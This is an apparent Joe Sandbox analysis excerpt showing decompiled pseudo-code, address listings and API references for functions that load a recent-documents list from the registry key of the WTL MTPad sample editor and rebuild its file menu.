                                                                                                                                                                                                                                                                                          				intOrPtr _v31;
                                                                                                                                                                                                                                                                                          				char _v32;
                                                                                                                                                                                                                                                                                          				char _v299;
                                                                                                                                                                                                                                                                                          				char _v300;
                                                                                                                                                                                                                                                                                          				char _v564;
                                                                                                                                                                                                                                                                                          				void* _v568;
                                                                                                                                                                                                                                                                                          				int _v572;
                                                                                                                                                                                                                                                                                          				int _v576;
                                                                                                                                                                                                                                                                                          				void* _v580;
                                                                                                                                                                                                                                                                                          				char _v584;
                                                                                                                                                                                                                                                                                          				int** _v588;
                                                                                                                                                                                                                                                                                          				int* _v592;
                                                                                                                                                                                                                                                                                          				int* _v596;
                                                                                                                                                                                                                                                                                          				int* _v600;
                                                                                                                                                                                                                                                                                          				int* _v604;
                                                                                                                                                                                                                                                                                          				int* _v608;
                                                                                                                                                                                                                                                                                          				int* _v612;
                                                                                                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                                                                                          				signed int _t68;
                                                                                                                                                                                                                                                                                          				signed int _t69;
                                                                                                                                                                                                                                                                                          				void* _t73;
                                                                                                                                                                                                                                                                                          				char _t80;
                                                                                                                                                                                                                                                                                          				void* _t84;
                                                                                                                                                                                                                                                                                          				void* _t86;
                                                                                                                                                                                                                                                                                          				void* _t87;
                                                                                                                                                                                                                                                                                          				int _t97;
                                                                                                                                                                                                                                                                                          				int _t98;
                                                                                                                                                                                                                                                                                          				int* _t106;
                                                                                                                                                                                                                                                                                          				void* _t107;
                                                                                                                                                                                                                                                                                          				void* _t122;
                                                                                                                                                                                                                                                                                          				void* _t123;
                                                                                                                                                                                                                                                                                          				int** _t124;
                                                                                                                                                                                                                                                                                          				void* _t128;
                                                                                                                                                                                                                                                                                          				void* _t129;
                                                                                                                                                                                                                                                                                          				int* _t130;
                                                                                                                                                                                                                                                                                          				void* _t132;
                                                                                                                                                                                                                                                                                          				signed int _t133;
                                                                                                                                                                                                                                                                                          				void* _t134;
                                                                                                                                                                                                                                                                                          				void* _t135;
                                                                                                                                                                                                                                                                                          				void* _t136;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_push(0xffffffff);
                                                                                                                                                                                                                                                                                          				_push(E0010F486);
                                                                                                                                                                                                                                                                                          				_push( *[fs:0x0]);
                                                                                                                                                                                                                                                                                          				_t135 = _t134 - 0x258;
                                                                                                                                                                                                                                                                                          				_t68 =  *0x159060; // 0x1f9a9bdf
                                                                                                                                                                                                                                                                                          				_t69 = _t68 ^ _t133;
                                                                                                                                                                                                                                                                                          				_v20 = _t69;
                                                                                                                                                                                                                                                                                          				_push(_t69);
                                                                                                                                                                                                                                                                                          				 *[fs:0x0] =  &_v16;
                                                                                                                                                                                                                                                                                          				_t106 = 0;
                                                                                                                                                                                                                                                                                          				_v588 = _a4;
                                                                                                                                                                                                                                                                                          				_v600 = 0;
                                                                                                                                                                                                                                                                                          				_v596 = 0;
                                                                                                                                                                                                                                                                                          				_v592 = 0;
                                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                                          				_v612 = 0;
                                                                                                                                                                                                                                                                                          				_v608 = 0;
                                                                                                                                                                                                                                                                                          				_v604 = 0;
                                                                                                                                                                                                                                                                                          				_v8 = 1;
                                                                                                                                                                                                                                                                                          				_v580 = 0;
                                                                                                                                                                                                                                                                                          				if(RegOpenKeyExA(0x80000001, "Software\\Microsoft\\WTL Samples\\MTPad", 0, 0x2001f,  &_v580) != 0) {
                                                                                                                                                                                                                                                                                          					L8:
                                                                                                                                                                                                                                                                                          					_t73 = 0;
                                                                                                                                                                                                                                                                                          					L36:
                                                                                                                                                                                                                                                                                          					 *[fs:0x0] = _v16;
                                                                                                                                                                                                                                                                                          					_pop(_t122);
                                                                                                                                                                                                                                                                                          					_pop(_t128);
                                                                                                                                                                                                                                                                                          					_pop(_t107);
                                                                                                                                                                                                                                                                                          					return E001059E6(_t73, _t107, _v20 ^ _t133, _t118, _t122, _t128);
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				_t123 = _v580;
                                                                                                                                                                                                                                                                                          				_t118 =  &_v568;
                                                                                                                                                                                                                                                                                          				_v596 = 0;
                                                                                                                                                                                                                                                                                          				_v600 = _t123;
                                                                                                                                                                                                                                                                                          				_v568 = 0;
                                                                                                                                                                                                                                                                                          				if(RegOpenKeyExA(_t123, "Recent Document List", 0, 0x2001f,  &_v568) != 0) {
                                                                                                                                                                                                                                                                                          					L6:
                                                                                                                                                                                                                                                                                          					if(_t123 != _t106) {
                                                                                                                                                                                                                                                                                          						RegCloseKey(_t123);
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					goto L8;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				_t129 = _v568;
                                                                                                                                                                                                                                                                                          				_t118 =  &_v576;
                                                                                                                                                                                                                                                                                          				_v608 = 0;
                                                                                                                                                                                                                                                                                          				_v612 = _t129;
                                                                                                                                                                                                                                                                                          				_v584 = 0;
                                                                                                                                                                                                                                                                                          				_v572 = 4;
                                                                                                                                                                                                                                                                                          				if(RegQueryValueExA(_t129, "DocumentCount", 0,  &_v576,  &_v584,  &_v572) != 0 || _v576 != 4) {
                                                                                                                                                                                                                                                                                          					if(_t129 != _t106) {
                                                                                                                                                                                                                                                                                          						RegCloseKey(_t129);
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					goto L6;
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					_t80 = _v584;
                                                                                                                                                                                                                                                                                          					if(_t80 >= 2) {
                                                                                                                                                                                                                                                                                          						if(_t80 > 0x10) {
                                                                                                                                                                                                                                                                                          							_t80 = 0x10;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						_t80 = 2;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_t124 = _v588;
                                                                                                                                                                                                                                                                                          					_t124[3] = _t80;
                                                                                                                                                                                                                                                                                          					_t81 =  *_t124;
                                                                                                                                                                                                                                                                                          					if( *_t124 != _t106) {
                                                                                                                                                                                                                                                                                          						E00105DE2(_t81);
                                                                                                                                                                                                                                                                                          						_t135 = _t135 + 4;
                                                                                                                                                                                                                                                                                          						 *_t124 = _t106;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_t124[1] = _t106;
                                                                                                                                                                                                                                                                                          					_t124[2] = _t106;
                                                                                                                                                                                                                                                                                          					_v300 = _t106;
                                                                                                                                                                                                                                                                                          					E00106820( &_v299, _t106, 0x103);
                                                                                                                                                                                                                                                                                          					_t130 = _t124[3];
                                                                                                                                                                                                                                                                                          					_t136 = _t135 + 0xc;
                                                                                                                                                                                                                                                                                          					if(_t130 <= _t106) {
                                                                                                                                                                                                                                                                                          						L27:
                                                                                                                                                                                                                                                                                          						if(_v568 != _t106) {
                                                                                                                                                                                                                                                                                          							RegCloseKey(_v568);
                                                                                                                                                                                                                                                                                          							_v612 = _t106;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						_t84 = _v580;
                                                                                                                                                                                                                                                                                          						if(_t84 != _t106) {
                                                                                                                                                                                                                                                                                          							RegCloseKey(_t84);
                                                                                                                                                                                                                                                                                          							_v600 = _t106;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						_t132 = E000FD690(_t118, _v588);
                                                                                                                                                                                                                                                                                          						_t86 = _v612;
                                                                                                                                                                                                                                                                                          						if(_t86 != _t106) {
                                                                                                                                                                                                                                                                                          							RegCloseKey(_t86);
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						_t87 = _v600;
                                                                                                                                                                                                                                                                                          						if(_t87 != _t106) {
                                                                                                                                                                                                                                                                                          							RegCloseKey(_t87);
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						_t73 = _t132;
                                                                                                                                                                                                                                                                                          						goto L36;
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						do {
                                                                                                                                                                                                                                                                                          							_v32 = _t106;
                                                                                                                                                                                                                                                                                          							_v31 = 0;
                                                                                                                                                                                                                                                                                          							_v27 = 0;
                                                                                                                                                                                                                                                                                          							_v23 = 0;
                                                                                                                                                                                                                                                                                          							E000F4980( &_v32, "Document%i", _t130);
                                                                                                                                                                                                                                                                                          							_t136 = _t136 + 8;
                                                                                                                                                                                                                                                                                          							_t118 = _v568;
                                                                                                                                                                                                                                                                                          							_v572 = 0x104;
                                                                                                                                                                                                                                                                                          							if(RegQueryValueExA(_v568,  &_v32, _t106,  &_v576,  &_v300,  &_v572) != _t106) {
                                                                                                                                                                                                                                                                                          								goto L26;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							_t97 = _v576;
                                                                                                                                                                                                                                                                                          							if(_t97 == 1 || _t97 == 2) {
                                                                                                                                                                                                                                                                                          								_t98 = _v572;
                                                                                                                                                                                                                                                                                          								if(_t98 == _t106) {
                                                                                                                                                                                                                                                                                          									_v300 = _t106;
                                                                                                                                                                                                                                                                                          									L23:
                                                                                                                                                                                                                                                                                          									if(lstrlenA( &_v300) < 0x104) {
                                                                                                                                                                                                                                                                                          										_t118 =  &_v564;
                                                                                                                                                                                                                                                                                          										lstrcpyA( &_v564,  &_v300);
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          									E000FD980( &_v564, _t124);
                                                                                                                                                                                                                                                                                          									_t106 = 0;
                                                                                                                                                                                                                                                                                          									goto L26;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								if( *((intOrPtr*)(_t133 + _t98 - 0x129)) == _t106) {
                                                                                                                                                                                                                                                                                          									goto L23;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							L26:
                                                                                                                                                                                                                                                                                          							_t130 = _t130 - 1;
                                                                                                                                                                                                                                                                                          						} while (_t130 > _t106);
                                                                                                                                                                                                                                                                                          						goto L27;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}


















































                                                                                                                                                                                                                                                                                          0x000fb463
                                                                                                                                                                                                                                                                                          0x000fb465
                                                                                                                                                                                                                                                                                          0x000fb470
                                                                                                                                                                                                                                                                                          0x000fb471
                                                                                                                                                                                                                                                                                          0x000fb477
                                                                                                                                                                                                                                                                                          0x000fb47c
                                                                                                                                                                                                                                                                                          0x000fb47e
                                                                                                                                                                                                                                                                                          0x000fb484
                                                                                                                                                                                                                                                                                          0x000fb488
                                                                                                                                                                                                                                                                                          0x000fb491
                                                                                                                                                                                                                                                                                          0x000fb493
                                                                                                                                                                                                                                                                                          0x000fb499
                                                                                                                                                                                                                                                                                          0x000fb49f
                                                                                                                                                                                                                                                                                          0x000fb4a5
                                                                                                                                                                                                                                                                                          0x000fb4ab
                                                                                                                                                                                                                                                                                          0x000fb4ae
                                                                                                                                                                                                                                                                                          0x000fb4b4
                                                                                                                                                                                                                                                                                          0x000fb4ba
                                                                                                                                                                                                                                                                                          0x000fb4cd
                                                                                                                                                                                                                                                                                          0x000fb4e1
                                                                                                                                                                                                                                                                                          0x000fb4eb
                                                                                                                                                                                                                                                                                          0x000fb589
                                                                                                                                                                                                                                                                                          0x000fb589
                                                                                                                                                                                                                                                                                          0x000fb70b
                                                                                                                                                                                                                                                                                          0x000fb70e
                                                                                                                                                                                                                                                                                          0x000fb716
                                                                                                                                                                                                                                                                                          0x000fb717
                                                                                                                                                                                                                                                                                          0x000fb718
                                                                                                                                                                                                                                                                                          0x000fb726
                                                                                                                                                                                                                                                                                          0x000fb726
                                                                                                                                                                                                                                                                                          0x000fb4f1
                                                                                                                                                                                                                                                                                          0x000fb4f7
                                                                                                                                                                                                                                                                                          0x000fb50a
                                                                                                                                                                                                                                                                                          0x000fb510
                                                                                                                                                                                                                                                                                          0x000fb516
                                                                                                                                                                                                                                                                                          0x000fb520
                                                                                                                                                                                                                                                                                          0x000fb57e
                                                                                                                                                                                                                                                                                          0x000fb580
                                                                                                                                                                                                                                                                                          0x000fb583
                                                                                                                                                                                                                                                                                          0x000fb583
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fb580
                                                                                                                                                                                                                                                                                          0x000fb522
                                                                                                                                                                                                                                                                                          0x000fb536
                                                                                                                                                                                                                                                                                          0x000fb544
                                                                                                                                                                                                                                                                                          0x000fb54a
                                                                                                                                                                                                                                                                                          0x000fb550
                                                                                                                                                                                                                                                                                          0x000fb556
                                                                                                                                                                                                                                                                                          0x000fb568
                                                                                                                                                                                                                                                                                          0x000fb575
                                                                                                                                                                                                                                                                                          0x000fb578
                                                                                                                                                                                                                                                                                          0x000fb578
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fb590
                                                                                                                                                                                                                                                                                          0x000fb590
                                                                                                                                                                                                                                                                                          0x000fb599
                                                                                                                                                                                                                                                                                          0x000fb5a5
                                                                                                                                                                                                                                                                                          0x000fb5a7
                                                                                                                                                                                                                                                                                          0x000fb5a7
                                                                                                                                                                                                                                                                                          0x000fb59b
                                                                                                                                                                                                                                                                                          0x000fb59b
                                                                                                                                                                                                                                                                                          0x000fb59b
                                                                                                                                                                                                                                                                                          0x000fb5ac
                                                                                                                                                                                                                                                                                          0x000fb5b2
                                                                                                                                                                                                                                                                                          0x000fb5b5
                                                                                                                                                                                                                                                                                          0x000fb5b9
                                                                                                                                                                                                                                                                                          0x000fb5bc
                                                                                                                                                                                                                                                                                          0x000fb5c1
                                                                                                                                                                                                                                                                                          0x000fb5c4
                                                                                                                                                                                                                                                                                          0x000fb5c4
                                                                                                                                                                                                                                                                                          0x000fb5d3
                                                                                                                                                                                                                                                                                          0x000fb5d6
                                                                                                                                                                                                                                                                                          0x000fb5d9
                                                                                                                                                                                                                                                                                          0x000fb5df
                                                                                                                                                                                                                                                                                          0x000fb5e4
                                                                                                                                                                                                                                                                                          0x000fb5e7
                                                                                                                                                                                                                                                                                          0x000fb5ec
                                                                                                                                                                                                                                                                                          0x000fb6b2
                                                                                                                                                                                                                                                                                          0x000fb6be
                                                                                                                                                                                                                                                                                          0x000fb6c7
                                                                                                                                                                                                                                                                                          0x000fb6c9
                                                                                                                                                                                                                                                                                          0x000fb6c9
                                                                                                                                                                                                                                                                                          0x000fb6cf
                                                                                                                                                                                                                                                                                          0x000fb6d7
                                                                                                                                                                                                                                                                                          0x000fb6da
                                                                                                                                                                                                                                                                                          0x000fb6dc
                                                                                                                                                                                                                                                                                          0x000fb6dc
                                                                                                                                                                                                                                                                                          0x000fb6ed
                                                                                                                                                                                                                                                                                          0x000fb6ef
                                                                                                                                                                                                                                                                                          0x000fb6f7
                                                                                                                                                                                                                                                                                          0x000fb6fa
                                                                                                                                                                                                                                                                                          0x000fb6fa
                                                                                                                                                                                                                                                                                          0x000fb6fc
                                                                                                                                                                                                                                                                                          0x000fb704
                                                                                                                                                                                                                                                                                          0x000fb707
                                                                                                                                                                                                                                                                                          0x000fb707
                                                                                                                                                                                                                                                                                          0x000fb709
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fb5f2
                                                                                                                                                                                                                                                                                          0x000fb5f2
                                                                                                                                                                                                                                                                                          0x000fb5fd
                                                                                                                                                                                                                                                                                          0x000fb600
                                                                                                                                                                                                                                                                                          0x000fb603
                                                                                                                                                                                                                                                                                          0x000fb606
                                                                                                                                                                                                                                                                                          0x000fb60a
                                                                                                                                                                                                                                                                                          0x000fb60f
                                                                                                                                                                                                                                                                                          0x000fb620
                                                                                                                                                                                                                                                                                          0x000fb633
                                                                                                                                                                                                                                                                                          0x000fb645
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fb647
                                                                                                                                                                                                                                                                                          0x000fb650
                                                                                                                                                                                                                                                                                          0x000fb657
                                                                                                                                                                                                                                                                                          0x000fb65f
                                                                                                                                                                                                                                                                                          0x000fb66c
                                                                                                                                                                                                                                                                                          0x000fb672
                                                                                                                                                                                                                                                                                          0x000fb684
                                                                                                                                                                                                                                                                                          0x000fb68d
                                                                                                                                                                                                                                                                                          0x000fb694
                                                                                                                                                                                                                                                                                          0x000fb694
                                                                                                                                                                                                                                                                                          0x000fb6a2
                                                                                                                                                                                                                                                                                          0x000fb6a7
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fb6a7
                                                                                                                                                                                                                                                                                          0x000fb668
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fb66a
                                                                                                                                                                                                                                                                                          0x000fb6a9
                                                                                                                                                                                                                                                                                          0x000fb6a9
                                                                                                                                                                                                                                                                                          0x000fb6aa
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fb5f2
                                                                                                                                                                                                                                                                                          0x000fb5ec

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • RegOpenKeyExA.ADVAPI32(80000001,Software\Microsoft\WTL Samples\MTPad,00000000,0002001F,?,1F9A9BDF,?,?,7490B980), ref: 000FB4E7
                                                                                                                                                                                                                                                                                          • RegOpenKeyExA.ADVAPI32(?,Recent Document List,00000000,0002001F,?), ref: 000FB51C
                                                                                                                                                                                                                                                                                          • RegQueryValueExA.ADVAPI32(?,DocumentCount,00000000,?,?,?), ref: 000FB560
                                                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 000FB578
                                                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 000FB583
                                                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 000FB5DF
                                                                                                                                                                                                                                                                                          • RegQueryValueExA.ADVAPI32(?,?,00000000,00000004,?,00000004), ref: 000FB63D
                                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 000FB679
                                                                                                                                                                                                                                                                                          • lstrcpyA.KERNEL32(?,?), ref: 000FB694
                                                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 000FB6C7
                                                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 000FB6DA
                                                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 000FB6FA
                                                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 000FB707
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Close$OpenQueryValue$_memsetlstrcpylstrlen
                                                                                                                                                                                                                                                                                          • String ID: Document%i$DocumentCount$Recent Document List$Software\Microsoft\WTL Samples\MTPad
                                                                                                                                                                                                                                                                                          • API String ID: 4108690943-1733117880
                                                                                                                                                                                                                                                                                          • Opcode ID: dd52fa26514a19264c86e4719bb69930fb05de84a5ca6ac9ed5ae8499e8cbdf7
                                                                                                                                                                                                                                                                                          • Instruction ID: 42421f6a9ddeac9f1562b35f71bf0e101ad2c799887c06f4d2a2006e144ddab2
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dd52fa26514a19264c86e4719bb69930fb05de84a5ca6ac9ed5ae8499e8cbdf7
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DE810AB1D0066D9BCB609F59CCC8AEEF7B9EB48300F5045AAE609E7640D7789E849F50
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 93%
                                                                                                                                                                                                                                                                                          			E000FD690(void* __edx, intOrPtr* __esi) {
                                                                                                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                                                                                                          				struct _OSVERSIONINFOA _v164;
                                                                                                                                                                                                                                                                                          				char _v275;
                                                                                                                                                                                                                                                                                          				char _v276;
                                                                                                                                                                                                                                                                                          				char _v547;
                                                                                                                                                                                                                                                                                          				char _v548;
                                                                                                                                                                                                                                                                                          				long _v552;
                                                                                                                                                                                                                                                                                          				intOrPtr _v556;
                                                                                                                                                                                                                                                                                          				int _v560;
                                                                                                                                                                                                                                                                                          				signed int _v564;
                                                                                                                                                                                                                                                                                          				struct tagMENUITEMINFOA _v612;
                                                                                                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                                                                                          				signed int _t61;
                                                                                                                                                                                                                                                                                          				struct HMENU__* _t63;
                                                                                                                                                                                                                                                                                          				int _t64;
                                                                                                                                                                                                                                                                                          				signed int _t66;
                                                                                                                                                                                                                                                                                          				intOrPtr _t76;
                                                                                                                                                                                                                                                                                          				long _t86;
                                                                                                                                                                                                                                                                                          				intOrPtr _t98;
                                                                                                                                                                                                                                                                                          				void* _t100;
                                                                                                                                                                                                                                                                                          				int _t101;
                                                                                                                                                                                                                                                                                          				intOrPtr _t108;
                                                                                                                                                                                                                                                                                          				void* _t128;
                                                                                                                                                                                                                                                                                          				int _t129;
                                                                                                                                                                                                                                                                                          				signed int _t132;
                                                                                                                                                                                                                                                                                          				void* _t133;
                                                                                                                                                                                                                                                                                          				void* _t134;
                                                                                                                                                                                                                                                                                          				void* _t135;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t131 = __esi;
                                                                                                                                                                                                                                                                                          				_t61 =  *0x159060; // 0x1f9a9bdf
                                                                                                                                                                                                                                                                                          				_v8 = _t61 ^ _t132;
                                                                                                                                                                                                                                                                                          				_t63 =  *(__esi + 0x10);
                                                                                                                                                                                                                                                                                          				if(_t63 != 0) {
                                                                                                                                                                                                                                                                                          					_t64 = GetMenuItemCount(_t63);
                                                                                                                                                                                                                                                                                          					_t101 = 0;
                                                                                                                                                                                                                                                                                          					_v552 = _t64;
                                                                                                                                                                                                                                                                                          					_v560 = 0;
                                                                                                                                                                                                                                                                                          					if(_t64 > 0) {
                                                                                                                                                                                                                                                                                          						do {
                                                                                                                                                                                                                                                                                          							E00106820( &_v612, 0, 0x30);
                                                                                                                                                                                                                                                                                          							_v612.cbSize = 0x30;
                                                                                                                                                                                                                                                                                          							E00106820( &(_v164.dwMajorVersion), 0, 0x90);
                                                                                                                                                                                                                                                                                          							_t133 = _t133 + 0x18;
                                                                                                                                                                                                                                                                                          							_v164.dwOSVersionInfoSize = 0x94;
                                                                                                                                                                                                                                                                                          							if(GetVersionExA( &_v164) == 0) {
                                                                                                                                                                                                                                                                                          								L8:
                                                                                                                                                                                                                                                                                          								_v612.cbSize = 0x2c;
                                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                                          								_t98 = _v164.dwMajorVersion;
                                                                                                                                                                                                                                                                                          								if(_t98 < 5 && (_t98 != 4 || _v164.dwMinorVersion < 0x5a)) {
                                                                                                                                                                                                                                                                                          									goto L8;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							_v612.fMask = 2;
                                                                                                                                                                                                                                                                                          							GetMenuItemInfoA( *(_t131 + 0x10), _t101, 1,  &_v612);
                                                                                                                                                                                                                                                                                          							if(_v612.wID != 0xe110) {
                                                                                                                                                                                                                                                                                          								goto L10;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							break;
                                                                                                                                                                                                                                                                                          							L10:
                                                                                                                                                                                                                                                                                          							_t101 = _t101 + 1;
                                                                                                                                                                                                                                                                                          						} while (_t101 < _v552);
                                                                                                                                                                                                                                                                                          						_v560 = _t101;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_t129 = 0xe110;
                                                                                                                                                                                                                                                                                          					if( *((intOrPtr*)(_t131 + 0xc)) + 0xe110 > 0xe110) {
                                                                                                                                                                                                                                                                                          						do {
                                                                                                                                                                                                                                                                                          							if(_t129 != 0xe110) {
                                                                                                                                                                                                                                                                                          								DeleteMenu( *(_t131 + 0x10), _t129, 0);
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							_t129 = _t129 + 1;
                                                                                                                                                                                                                                                                                          						} while (_t129 <  *((intOrPtr*)(_t131 + 0xc)) + 0xe110);
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_v548 = 0;
                                                                                                                                                                                                                                                                                          					E00106820( &_v547, 0, 0x109);
                                                                                                                                                                                                                                                                                          					_t66 =  *(_t131 + 4);
                                                                                                                                                                                                                                                                                          					_t134 = _t133 + 0xc;
                                                                                                                                                                                                                                                                                          					_v564 = _t66;
                                                                                                                                                                                                                                                                                          					if(_t66 <= 0) {
                                                                                                                                                                                                                                                                                          						L29:
                                                                                                                                                                                                                                                                                          						InsertMenuA( *(_t131 + 0x10), _t101, 0x400, 0xe110, _t131 + 0x14);
                                                                                                                                                                                                                                                                                          						_t122 =  *(_t131 + 0x10);
                                                                                                                                                                                                                                                                                          						EnableMenuItem( *(_t131 + 0x10), 0xe110, 1);
                                                                                                                                                                                                                                                                                          						_v552 = 1;
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						_t27 = _t66 - 1; // -1
                                                                                                                                                                                                                                                                                          						_t108 = _t27;
                                                                                                                                                                                                                                                                                          						_v552 = 0;
                                                                                                                                                                                                                                                                                          						_t129 = 1;
                                                                                                                                                                                                                                                                                          						_v556 = _t108;
                                                                                                                                                                                                                                                                                          						_t101 = _t66 * 0x104 - 0x104;
                                                                                                                                                                                                                                                                                          						L19:
                                                                                                                                                                                                                                                                                          						while(1) {
                                                                                                                                                                                                                                                                                          							if( *((intOrPtr*)(_t131 + 0x118)) != 0xffffffff) {
                                                                                                                                                                                                                                                                                          								_v276 = 0;
                                                                                                                                                                                                                                                                                          								E00106820( &_v275, 0, 0x103);
                                                                                                                                                                                                                                                                                          								_t76 = _v556;
                                                                                                                                                                                                                                                                                          								_t135 = _t134 + 0xc;
                                                                                                                                                                                                                                                                                          								if(_t76 < 0 || _t76 >=  *(_t131 + 4)) {
                                                                                                                                                                                                                                                                                          									goto L28;
                                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                                          									E000F6040( *_t131 + _t101,  &_v276,  *((intOrPtr*)(_t131 + 0x118)));
                                                                                                                                                                                                                                                                                          									_push( &_v276);
                                                                                                                                                                                                                                                                                          									E000F4980( &_v548, "&%i %s", _t129);
                                                                                                                                                                                                                                                                                          									_t134 = _t135 + 0x14;
                                                                                                                                                                                                                                                                                          									goto L26;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                                          								if(_t108 < 0 || _t108 >=  *(_t131 + 4)) {
                                                                                                                                                                                                                                                                                          									L28:
                                                                                                                                                                                                                                                                                          									RaiseException(0xc000008c, 1, 0, 0);
                                                                                                                                                                                                                                                                                          									goto L29;
                                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                                          									_push( *_t131 + _t101);
                                                                                                                                                                                                                                                                                          									E000F4980( &_v548, "&%i %s", _t129);
                                                                                                                                                                                                                                                                                          									_t134 = _t134 + 0xc;
                                                                                                                                                                                                                                                                                          									L26:
                                                                                                                                                                                                                                                                                          									_t44 = _t129 + 0xe10f; // 0xe111
                                                                                                                                                                                                                                                                                          									_t122 =  *(_t131 + 0x10);
                                                                                                                                                                                                                                                                                          									InsertMenuA( *(_t131 + 0x10), _v560 + _t129 - 1, 0x400, _t44,  &_v548);
                                                                                                                                                                                                                                                                                          									_v556 = _v556 - 1;
                                                                                                                                                                                                                                                                                          									_t86 = _v552 + 1;
                                                                                                                                                                                                                                                                                          									_t101 = _t101 - 0x104;
                                                                                                                                                                                                                                                                                          									_t129 = _t129 + 1;
                                                                                                                                                                                                                                                                                          									_v552 = _t86;
                                                                                                                                                                                                                                                                                          									if(_t86 < _v564) {
                                                                                                                                                                                                                                                                                          										_t108 = _v556;
                                                                                                                                                                                                                                                                                          										continue;
                                                                                                                                                                                                                                                                                          									} else {
